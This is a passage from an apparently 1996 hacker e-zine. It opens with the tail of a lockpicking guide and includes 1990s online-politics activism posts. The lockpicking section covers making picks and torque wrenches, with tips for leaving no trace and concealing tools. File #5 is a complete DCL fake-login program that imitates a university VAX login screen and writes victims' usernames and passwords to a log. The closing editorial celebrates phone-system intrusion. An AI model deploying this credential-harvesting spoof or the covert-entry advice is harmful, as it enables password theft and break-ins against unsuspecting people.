avoid leaving traces, you must avoid scrubbing.
The snake tip can be used for scrubbing or picking. When
scrubbing, the multiple bumps generate more action than a
regular pick. The snake tip is particularly good at opening
five-pin household locks. When a snake tip is used for picking,
it can set two or three pins at once. Basically, the snake pick
acts like a segment of a key which can be adjusted by lifting
and lowering the tip, by tilting it back and forth, and by using
either the top or bottom of the tip. You should use moderate to
heavy torque with a snake pick to allow several pins to bind at
the same time. This style of picking is faster than using a rake
and it leaves as little evidence.
A.2 Street Cleaner Bristles
The spring steel bristles used on street cleaners make
excellent tools for lockpicking. The bristles have the right
thickness and width, and they are easy to grind into the desired
shape. The resulting tools are springy and strong. Section A.3
describes how to make tools that are less springy.
The first step in making tools is to sand off any rust on
the bristles. Course grit sand paper works fine as does steel
wool cleaning pad (not copper wool). If the edges or tip of the
bristle are worn down, use a file to make them square.
A torque wrench has a head and a handle as shown in Figure
A.2. The head is usually 1/2 to 3/4 of an inch long and the
handle varies from 2 to 4 inches long. The head and the handle
are separated by a bend that is about 80 degrees. The head must
be long enough to reach over any protrusions (such as a grip-
proof collar) and firmly engage the plug. A long handle allows
delicate control over torque, but if it is too long, it will
bump against the door frame. The handle, head and bend angle can
be made quite small if you want to make tools that are easy to
conceal (e.g., in a pen, flashlight or belt buckle). Some torque
wrenches have a 90 degree twist in the handle. The twist makes
it easy to control the torque by controlling how far the handle
has been deflected from its rest position. The handle acts as a
spring which sets the torque. The disadvantage of this method of
setting the torque is that you get less feedback about the
rotation of the plug. To pick difficult locks you will need to
learn how to apply a steady torque via a stiff handled torque
wrench.
The width of the head of a torque wrench determines how
well it will fit the keyway. Locks with narrow keyways (e.g.
desk locks) need torque wrenches with narrow heads. Before
bending the bristle, file the head to the desired width. A
general purpose wrench can be made by narrowing the tip (about
1/4 inch) of the head. The tip fits small keyways while the rest
of the head is wide enough to grab a normal keyway.
The hard part of making a torque wrench is bending the
bristle without cracking it. To make the 90 degree handle twist,
clamp the head of the bristle (about one inch) in a vise and use
pliers to grasp the bristle about 3/8 of an inch above the vise.
You can use another pair of pliers instead of a vise. Apply a 45
degree twist. Try to keep the axis of the twist lined up with
the axis of the bristle. Now move the pliers back another 3/8
inch and apply the remaining 45 degrees. You will need to twist
the bristle more than 90 degrees in order to set a permanent 90
degree twist.
To make the 80 degree head bend, lift the bristle out of
the vise by about 1/4 inch (so 3/4 inch is still in the vise).
Place the shank of a screw driver against the bristle and bend
the spring steel around it about 90 degrees. This should set a
permanent 80 degree bend in the metal. Try to keep the axis of
the bend perpendicular to the handle. The screwdriver shank
ensures that the radius of curvature will not be too small. Any
rounded object will work (e.g. drill bit, needle nose plies, or
a pen cap). If you have trouble with this method, try grasping
the bristle with two pliers separated by about 1/2 inch and
bend. This method produces a gentle curve that won't break the
bristle.
A grinding wheel will greatly speed the job of making a
pick. It takes a bit of practice to learn how to make smooth
cuts with a grinding wheel, but it takes less time to practice
and make two or three picks than it does to hand file a single
pick. The first step is to cut the front angle of the pick. Use
the front of the wheel to do this. Hold the bristle at 45
degrees to the wheel and move the bristle side to side as you
grind away the metal. Grind slowly to avoid overheating the
metal, which makes it brittle. If the metal changes color (to
dark blue), you have overheated it, and you should grind away
the colored portion. Next, cut the back angle of the tip using
the corner of the wheel. Usually one corner is sharper than the
other, and you should use that one. Hold the pick at the desired
angle and slowly push it into the corner of the wheel. The side
of the stone should cut the back angle. Be sure that the tip of
the pick is supported. If the grinding wheel stage is not close
enough to the wheel to support the tip, use needle nose pliers
to hold the tip. The cut should pass through about 2/3 of the
width of the bristle. If the tip came out well, continue.
Otherwise break it off and try again. You can break the bristle
by clamping it into a vice and bending it sharply.
The corner of the wheel is also used to grind the tang of
the pick. Put a scratch mark to indicate how far back the tang
should go. The tang should be long enough to allow the tip to
pass over the back pin of a seven pin lock. Cut the tang by
making several smooth passes over the corner. Each pass starts
at the tip and moves to the scratch mark. Try to remove less
than a 1/16th of an inch of metal with each pass. I use two
fingers to hold the bristle on the stage at the proper angle
while my other hand pushed the handle of the pick to move the
tang along the corner. Use whatever technique works best for
you.
Use a hand file to finish the pick. It should feel smooth
if you run a finger nail over it. Any roughness will add noise
to the feedback you want to get from the lock.
The outer sheath of phone cable can be used as a handle for
the pick. Remove three or four of the wires from a length of
cable and push it over the pick. If the sheath won't stay in
place, you can put some epoxy on the handle before pushing the
sheath over it.
A.3 Bicycle Spokes
An alternative to making tools out of street cleaner
bristles is to make them out of nail and bicycle spokes. These
materials are easily accessible and when they are heat treated,
they will be stronger than tools made from the bristles.
A strong torque wrench can be constructed from an 8-penny
nail (about .1 inch diameter). First heat up the point with a
propane torch until it glows red, slowly remove it from the
flame, and let it air cool; this softens it. The burner of a gas
stove can be used instead of a torch. Grind it down into the
shape of a skinny screwdriver blade and bend it to about 80
degrees. The bend should be less than a right angle because some
lock faces are recessed behind a plate (called an escutcheon)
and you want the head of the wrench to be able to reach about
half an inch into the plug. Temper (harden) the torque wrench by
heating to bright orange and dunking it into ice water. You will
wind up with a virtually indestructible bent screwdriver that
will last for years under brutal use.
Bicycle spokes make excellent picks. Bend one to the shape
you want and file the side of the business end flat such that
it's strong in the vertical and flexy in the horizontal
direction. Try a right-angle hunk about an inch long for a
handle. For smaller picks, which you need for those really tiny
keyways, find any large-diameter spring and unbend it. If your
careful you don't have to play any metallurgical games.
A.4 Brick Strap
For perfectly serviceable key blanks that you can't
otherwise find at the store, use the metal strap they wrap
around bricks for shipping. It's wonderfully handy stuff for
just about anything you want to manufacture. To get around side
wards in the keyway, you can bend the strap lengthwise by
clamping it in a vice and tapping on the protruding part to bend
the piece to the required angle.
Brick strap is very hard. It can ruin a grinding wheel or
key cutting machine. A hand file is the recommended tool for
milling brick strap.
-= END OF FILE =-
* Origin: Combat Arms BBS - Portland, OR - (503) 221-1777 (1:105/68)
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #5 of 8
Yet Another Login Spoof
Brent Barnhill
>From 0211065@ACAD.NWMISSOURI.EDUWed Jan 24 13:08:04 1996
Date: Mon, 22 Jan 1996 16:52:08 -0600 (CST)
From: "HI JUST THOUGHT I WOULD DROP BY" <0211065@ACAD.NWMISSOURI.EDU>
To: mrs3691@hertz.njit.edu
Subject: fake login program
Hey there. I heard that you are the person to contact to submit hacker's
programs. Well, I just made a wonderful fake login program in DCL. The program
is supposed to work if someone lets someone else use my account to telnet to my
school and login. Well, here it is:
$ wait 00:00:02
$ set message/id/sev/facil/text
$ W :== Write sys$output
$ TI :== Type sys$input
$ TI
Trying Connected to ACAD.NWMISSOURI.EDU.
$ W ""
$ W ""
$ W ""
$ TI
Welcome to Northwest Missouri State University.
Current access is to a VAX Cluster on Node S0.
Missouri statutes prohibit computer tampering.
$ W ""
$ read/prompt = "Username: " sys$command username
$ set term/noecho
$ read/prompt = "Password: " sys$command password
$ set term/echo
$ open/write log d3:[211065]log.txt
$ write log username, " "
$ write log password, " "
$ close log
$ inquire/nopunctuation sel "User authorization failure.[26D"
$ if sel .eqs. "" then goto asdf
$ asdf:
$ read/prompt = "Username: " sys$command username
$ set term/noecho
$ read/prompt = "Password: " sys$command password
$ set term/echo
$ open/write log d3:[211065]log.txt
$ write log username, " "
$ write log password, " "
$ close log
$ inquire/nopunctuation sel "User authorization failure.[26D"
$ if sel .eqs. "" then goto klll
$ klll:
$ read/prompt = "Username: " sys$command username
$ set term/noecho
$ read/prompt = "Password: " sys$command password
$ set term/echo
$ open/write log d3:[211065]log.txt
$ write log username, " "
$ write log password, " "
$ close log
$ TI
User authorization failure
$ W ""
$ TI
Connection closed by Foreign Host
$ bye
Here is my wonderful info:
Brent Barnhill or "Hey"
(816) 562-6237
314 Dieterich http://www.nwmissouri.edu/~0211065
PLEASE FINGER ME SINCE I HAVE "TONS" OF FREE COOL STUFF!!!
Have a wonderful day!
Brent :)
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #6 of 8
A Request for Action
Jim Warren
I'm sending this to a journalists listserv and to various personal
contacts in the press, as well as to my GovAccess subscribers It is
highly time-sensitive.
Please accept this as a personal note Please RECIRCULATE it, widely.]
Folks,
There's a time to read and contemplate.
There's a time to discuss and debate and haggle -- with peers who have
about the equal power as you have over the nation's future.
And there's a time to ACT -- to DO SOMETHING! To IMPROVE OUR POTENTIAL FUTURE.
Please
I urge you I implore you --
Act NOW.
It is obvious that we MUST act. We MUST move our nation's "leaders" --
sometimes fearfully kicking and screaming -- into the Information Age We
must demand that those who wish to lead us must drive the "information
superhighways" that they are so zealously, piously -- and *ignorantly* --
attempting to police.
We MUST make them aware of the net's power as a tool of freedom and
democracy -- and effective grassroots action -- before they destroy its
potential.
For they are endangering us all, through posturing stupidity and
self-rightous arrogance.
That we MUST act is obvious from numerous examples. To name just a few:
* The administrations' (plural) zealous, continuing suppression of
standardized personal privacy protection for communications and files --
via globally- published, freely-available robust cryptography; blockading
needed privacy for business and citizens -- who are now "presumed innocent"
*only* during trial; only *after* being arrested and indicted;
* Last year's half-billion-dollar wiretap law, that forces every telephone
company to make our nation wiretap-ready for whichever facist first chooses
to abuse that awsome power;
* This year's successful efforts to make the government into our parent
and overseer -- a federal daddy censoring all that we say or see, if we
dare to use any "telecommunications device" (and it *doesn't* just
censoring the net!);
* The just-passed Telecommunications Deform Act -- that grants so much
freedom to those giant corporations who paid so much to those who voted
freedom to create cartels, to price-gouge where they have functional
monopolies, to sell our electronic news media to unscrupulous foreigners,
and to allow whichever media giant has the most money to buy control of and
monopolize the print and broadcast news channels in any geographic area;
and
* The legislation by senior Republican Congressman Henry Hyde, just
reported in net email, that would allegedly classify all abortion
information -- *medical*, social or political -- as "obscene," prohibiting
its discussion using any telecomm device, including telephones and the net.
(And that's not as draconian as what other senior "leaders" have proposed!)
YOU -- each of us -- CAN help presidential candidates better understand the net:
PRESIDENTIAL CANDIDATES ONLINE DEBATE, NOW!
As one tiny step for those asking to "lead" us into the 21st Century and
the Information Age -- to help them understand the net's potential -- I
have invited presidential candidates to participate in a week of online
debate (requiring only a few minutes daily; from any place; at any time;
presumably/hopefully with their staff doing the typing) Each day, the
candidates themselves, will question each other, followed by their
responses and then by rebuttals -- all of limited length submitted within
agreed-upon daily time limits, with pointers to additional online
information if they desire.
As the most significant current target of opportunity, I proposed the
debate for the Republican primary's presidential candidates Because the
driving force of their competition is likely to end after the Iowa caucuses
(2/12) and the New Hampshire primaries (2/20), I proposed that the debates
begin next Monday, Feb. 5th, and conclude Feb.11th.
If we can set the precedent with the Republicans, now, then substantive
online presidential debates will be likely prior to next November's general
elections If the primary debate doesn't happen now, it seems likely that
major presidential candidates will not debate online until the next
century!
MAJOR NATIONAL NEWS MEDIA COOPERATING
The U.S. NEWS & WORLD REPORT, Knight-Ridder's MERCURY CENTER at the SAN
JOSE MERCURY NEWS, and New Jersey's second-largest newspaper, the ASHBURY
PARK PRESS, have all agreed to carry any substantive presidential debate on
their public websites, and others are likely. (As a data-point, Mercury
Center typically gets 300,000 to 400,000 hits per day, and tops 500,000 on
"hot" news days.)
Numerous reporters, columnists and editors with mainstream media have said
that they would cover any substantive online debate that included major
candidates. Today, Reuters carried a major story about the proposed debate,
and others will appear shortly in U.S. NEWS & WORLD REPORT and in the
NATIONAL JOURNAL -- among others.
THREE CANDIDATES HAVE ACCEPTED -- BUT FIVE OTHERS REMAIN UNCOMMITED
Lugar, Taylor and Collins have already sent signed commitments to
participate Another candidate said no; another said yes and signed --
then reneged (below).
The agreement is that the debate will occur only if there are at least four
candidates And, unless at least one more "major" candidate joins the
debate, it's doubtful that the press will consider it substantive and worth
significant coverage.
The remaining candidates *must decide by NEXT MONDAY*!! Please -- help them:
ASK THOSE WHO WOULD BE OUR PRESIDENT TO PARTICIPATE IN OUR FUTURE -- NOW
The non-commited candidates will participate only if they believe that (1)
lots of people [voters] are interested, and (2) the press is likely to
cover it (The press *will* cover it, *if* several of the "major"
candidates participate.) As a voter, please
1 Phone, fax and email the candidates, NOW, asking them to participate
-- if they want us to believe they are competent to lead us into the
Information Age.
2 Email this message to every person you know who lives or works in
Iowa or New Hampshire (e.g., *all* the staff at the numerous computer
magazines in NH!).
Please - do it NOW!
Yes, the campaign managers *are* working day and night and through the weekend.
Let's demonstrate the power of the net -- before arrogance or stupidity
demolishes its power and potential Thanks for reading.
--jim
Jim Warren, GovAccess list-owner/editor (jwarren@well.com)
Member, Freedom-of-Information Committee, Soc. of Prof. Journalists - Nor. Cal.
Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc.
345 Swett Rd., Woodside CA 94062; voice/415-851-7075; fax/<# upon request>
[puffery: John Dvorak Lifetime Achievement Award (1995); James Madison
Freedom-of-Information Award, Soc. of Professional Journalists - Nor.Cal.
(1994); Hugh Hefner First-Amendment Award, Playboy Foundation (1994);
Pioneer Award, Electronic Frontier Foundation (its first year, 1992);
founded the Computers, Freedom & Privacy confs, InfoWorld; blah blah blah :-).]
Lamar Alexander: 615-327-3350; fax/615-340-0397, Campaign Mgr Dan Pero
lamar@Nashville.net
http://www.lamar.com/~lamar/
Phil Gramm: 202-467-8600; fax/202-467-8696, Campaign Mgr Jeb Hensarling
info@gramm96.org
http://www.gramm96.com/
Pat Buchanan: 703-848-1996; fax/703-827-0592, Campaign Mgr Terry Jeffries
lmuller@iquest.com
http://www.buchanan.org/
Bob Dole: 202-414-6400; fax/202-408-9446, Campaign Mgr Scott Reed
[apparently no email except via webpage]
http://www.dole96.org/
Steve Forbes: 908-781-5111 [the best # I've found]; fax/908-781-6001
forbes@forbes96.com
http://www.forbes96.com/
Those who have commited to debate:
Dick Lugar: fax/317-931-4106, Mark Lubbers <== WILL debate!
rgl@iquest.net
http://www.iquest.com/lugar/
Charles Collins: 912-994-8219; fax/912-994-7995, George Gruner <== WILL debate!
[may be] http://computek.net/public/collins/collins.html
Morry Taylor: fax/515-264-7510, Campaign Mgr Bill Kenyon <== WILL debate!
TPresident@aol.com
http://www.webcom.com/~morry96/
Those who have delined or reneged (might be worth email or a call):
Bob Dornan: fax/703-644-5117, Campaign Mgr Terri Cobban <== "Yes," then "No."
[I have a staffer's email address, but I believe it's nor public]
[may be] http://www.umr.edu/~sears/primary/dornan.html
Alan Keyes: 503-463-1818; fax/602-263-7790, Nat'l Polit.Dir George Uribe <== NO.
GeoUribe@aol.com
http://www.keyes.gocin.com/
Keyes campaign manager sent email saying, "I do like the concept and so
does Ambassador Keyes. Unfortunately we can't spare a week for a staffer to
service the program." (Yes, we spoke and I explained how online forums
operate, and how easily they can be done using minimal and flexible time.)
Dornan campaign manager Terri Cobban verbally agreed to debate, twice --
two days apart -- and they later faxed a written commitment, signed
explicitly by "Bob Dornan." But on Wednesday afternoon (1/31), Cobban
called and said they were cancelling. When I asked for a signed fax
confirming this, she said, "No, I feel a verbal statement is sufficient at
this time."
Mo' as it Is.
--jim
Jim Warren, GovAccess list-owner/editor (jwarren@well.com)
Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc.
345 Swett Rd., Woodside CA 94062; voice/415-851-7075; fax/<# upon request>
To add or drop GovAccess, email to Majordomo@well.com ('Subject' ignored)
with message: [un]subscribe GovAccess YourEmailAddress (insert your eaddr)
For brief description of GovAccess, send the message: info GovAccess
Past postings are at ftp.cpsr.org: /cpsr/states/california/govaccess
and by WWW at http://www.cpsr.org/cpsr/states/california/govaccess .
Also forwarded to USENET's comp.org.cpsr.talk by CPSR's Al Whaley.
May be copied & reposted except for any items that explicitly prohibit it.
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #7 of 8
Cyberspace Makes the Difference
Voter's Telecommunications Watch
FOR IMMEDIATE RELEASE FEBRUARY 1, 1996
Contact: Steven Cherry
. (201) 596-2851
stc@vtw.org
. Shabbir Safdar
. (718) 596-2851
. shabbir@vtw.org
New York, NY
RON WYDEN WINS SPECIAL OREGON SENATE ELECTION
INTERNET ACTIVIST GROUP CLAIMS
SHARE OF SUCCESS
Voter's Telecommunications Watch, an on-line civil liberties group
announced today that the closeness of the vote in Oregon's special
Senate election justified the attention given to the cyberspace vote by
the Wyden campaign. Wyden's 1% margin of victory represented fewer than
20,000 votes.
Wyden took pains to make his campaign accessible to Internet voters
through on-line appearances, an Internet account that answered voter
email promptly, by maintaining an active World Wide Web site, and by
being the first candidate in the 1996 election season to answer VTW's
Technology Pledge. The pledge consists of four questions that probe a
candidate's stand on the central cyberliberties issues of the day.
Wyden, currently serving in the House of Representatives, not only
answered all four Pledge questions in the affirmative, he was able to
point to a Congressional legislative record that supported those answers.
VTW and the Oregon on-line community widely circulated the answers of
three candidates to the pledge questionnaire, and received testimony from
many voters that the relative stands of the candidates on these
telecommunications issues determined their vote.
VTW looks forward to Wyden's contributions to telecommunications and
civil liberties issues shifting from the House to the Senate. It is also
encouraged that by helping to draw attention to the positions of
candidates throughout the 1996 elections, citizens involved in the
on-line world will make their voices heard in the voting booth.
Voters Telecommunications Watch is a volunteer organization, concentrating
on legislation as it relates to telecommunications and civil liberties.
VTW publishes a weekly BillWatch that tracks relevant legislation as it
progresses through Congress. It publishes periodic Alerts to inform the
about immediate action it can take to protect its on-line civil liberties
and privacy.
The Wyden campaign can still be contacted on-line or off- at:
Wyden for Senate
Sue Castner, Press Representative
PO Box 3498, Portland, OR 97208
503-248-9567, fax: 503-248-9890
wyden@teleport.com
http://www.teleport.com/~wyden
More information about VTW can be found on-line at
gopher -p 1/vtw gopher.panix.com
www: http://www.vtw.org
or by writing to vtw@vtw.org. The press can call (718) 596-2851 or
contact:
Shabbir Safdar Steven Cherry
shabbir@vtw.org stc@vtw.org
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #8 of 8
The End
There it goes again. Another issue came and went, and 30 more days
must come and go before the next fix of Hackers can be injected into your
blood stream. If you need to talk to somebody before than, I should be on the
Defcon bridge now and then, and the 2600 voice BBS As always, I'm at
mrs3691@hertz.njit.edu, (201) 565-9145, 621A Redwood Hall, 186 Bleeker St.,
Newark, NJ, 07103 The official web site is still
http://hertz.njit.edu/~mrs3691, and the official ftp site is still
infonexus.com
In your lab, tinkering with the inner flesh of the phone system,
toying with the defense networks of foreign countries, are you frustrated
because your work is taken for granted by huge corporations who pay well but
offer none of that feeling of accomplishment and awe that you desire so much?
Then submit an article to Hackers, and receive the recognition you so deserve.
I haven't decided whether the no-prize will be all the parts necessary
to build a beige box that aren't included in a normal phone, or a real live
visit with an intelligent Bell Atlantic Operator. But you have to submit to
win! So hopefully next issue will be chock full of ideas for those of us with
way too much consumer electronics lying around, and not enough to do with it.
See you next month, and wherever you hack, may the ethic be with you.
- Revolution